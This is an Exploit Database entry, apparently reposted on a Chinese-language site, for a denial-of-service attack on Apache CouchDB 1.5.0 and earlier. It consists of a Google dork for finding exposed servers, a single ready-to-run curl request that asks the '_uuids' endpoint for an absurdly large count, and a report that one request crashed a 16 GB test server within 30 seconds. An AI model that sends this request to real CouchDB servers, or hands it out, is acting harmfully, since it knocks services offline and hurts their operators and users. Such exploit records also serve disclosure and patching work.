Apache CouchDB 1.5.0 – ‘uuids’ Denial of Service

• Exploit Database
• 101 阅读

• 作者： Krusty Hack
  日期： 2014-03-26
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/32519/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

  # Exploit Title: Couchdb uuids DOS exploit # Google Dork inurl: _uuids # Date: 03/24/2014 # Exploit Author: KrustyHack # Vendor Homepage: http://couchdb.apache.org/ # Software Link: http://couchdb.apache.org/ # Version: up to 1.5.0 # Tested on: Linux Couchdb up to 1.5.0   HOW TO ====== curl http://couchdb_target/_uuids?count=99999999999999999999999999999999999999999999999999999999999999999999999   TEST ==== Tested on a 16G RAM Quadcore server. Couchdb dead on 30 seconds with only one GET request.